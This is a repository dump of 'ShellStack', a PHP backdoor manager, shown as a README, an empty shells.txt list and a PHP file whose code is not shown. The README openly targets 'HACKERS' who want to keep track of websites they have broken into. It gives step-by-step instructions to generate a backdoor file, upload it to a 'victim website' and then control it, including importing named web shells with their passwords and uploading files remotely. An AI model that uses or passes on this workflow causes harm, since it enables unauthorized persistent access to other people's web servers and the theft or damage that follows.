├── README.md ├── shells.txt └── shellstack.php /README.md: -------------------------------------------------------------------------------- 1 | # ShellStack 2 | #### Version 1.0 3 | ---- 4 | ShellStack is a PHP based backdoor management tool. This Tool comes handy for "HACKERS" who wish to keep a track of every website they hack. The tool generates a backdoor file which you just have to upload to the site and put the backdoor URL in the shells.txt present in the tool's directory. 5 | 6 | # With ShellStack You can 7 | - Import PHP Shells 8 | - Get Server Details 9 | - Upload Files From Your System using your terminal 10 | - And Above all You Can Manage Your Backdoors Efficiently 11 | 12 | # How To Use 13 | 1. `git clone https://github.com/Tuhinshubhra/shellstack` 14 | 2. `cd shellstack` 15 | 3. `php shellstack.php` 16 | 4. `generatebd` and exit the tool use CTRL + C - This will generate a backdoor file in the same directory as of the tool in a file named **backdoor.php** 17 | 5. Upload The Backdoor File To The Victim website 18 | 6. Copy The Backdoor URL and paste it in the **shells.txt** file present in the tool's directory and save it (*Each backdoor is separated by a new line*) 19 | 7. `php shellstack.php` 20 | 8. Enter The **Serial No** Assigned To The Backdoor 21 | 9. Rest is pretty Self explanatory 22 | 23 | **Watch The Video Here:** https://youtu.be/umk3ZNZ5Y1I 24 | 25 | # Requirements 26 | ``` 27 | php 28 | curl 29 | ``` 30 | # Example 31 | ``` 32 | root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php 33 | 34 | 35 | ________________________________________________________________________________ 36 | _______ _ _ _______ _______ _______ _______ _______ _ _ 37 | |______ |_____| |______ | | |______ | |_____| | |____/ 38 | ______| | | |______ |_____ |_____ ______| | | | |_____ | \_ 39 | ________________________________________________________________________________ 40 | 41 | Simple Backdoor Management System 42 | Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 43 | Shout Out: LulZSec India 44 | ================================================================================ 45 | 46 | 47 | 48 | List Of Backdoors: 49 | 50 | 0. http://localhost/backdoor.php 51 | ============================================= 52 | 53 | [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0 54 | 55 | [+] Shell Selected: http://localhost/backdoor.php 56 | [+] Validating Backdoor: Backdoor Found! 57 | 58 | List Of Actions 59 | ================ 60 | [1] Import PHP Shells 61 | [2] Server Details 62 | [3] Remove Backdoor 63 | [4] Remote File Upload 64 | [5] Exit 65 | 66 | [#] Select Option(1|2|3|4|5):2 67 | 68 | [+] Server Info 69 | [i] Sending Request And Getting Response... 70 | [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 71 | [i] Server IP: 127.0.0.1 72 | 73 | 74 | Press Enter To Continue 75 | 76 | 77 | List Of Actions 78 | ================ 79 | [1] Import PHP Shells 80 | [2] Server Details 81 | [3] Remove Backdoor 82 | [4] Remote File Upload 83 | [5] Exit 84 | 85 | [#] Select Option(1|2|3|4|5):1 86 | 87 | 88 | List Of Shells 89 | =============== 90 | [1] Dhanush shell {User & Pass : shellstack123} 91 | [2] B374K shell {Pass : shellstack123} 92 | [3] Kurama shell V.1.0 {Pass : red} 93 | [4] WSO shell {Pass : shellstack123} 94 | [5] MiNi shell {User & Pass : shellstack123} 95 | 96 | [#] Select Shell To Import(1-5):1 97 | 98 | 99 | [i] Importing Shell... 100 | [i] Sending Request And Getting Response... 101 | [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php 102 | 103 | 104 | Press Enter To Continue 105 | 106 | 107 | List Of Actions 108 | ================ 109 | [1] Import PHP Shells 110 | [2] Server Details 111 | [3] Remove Backdoor 112 | [4] Remote File Upload 113 | [5] Exit 114 | 115 | [#] Select Option(1|2|3|4|5):5 116 | root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 117 | 118 | ``` 119 | # Release(s) 120 | > Version 1.0 On 14-06-2017 121 | 122 | -------------------------------------------------------------------------------- /shells.txt: -------------------------------------------------------------------------------- 1 | remove this line and start adding backdoor URL's 2 | -------------------------------------------------------------------------------- /shellstack.php: -------------------------------------------------------------------------------- 1 | 188 | --------------------------------------------------------------------------------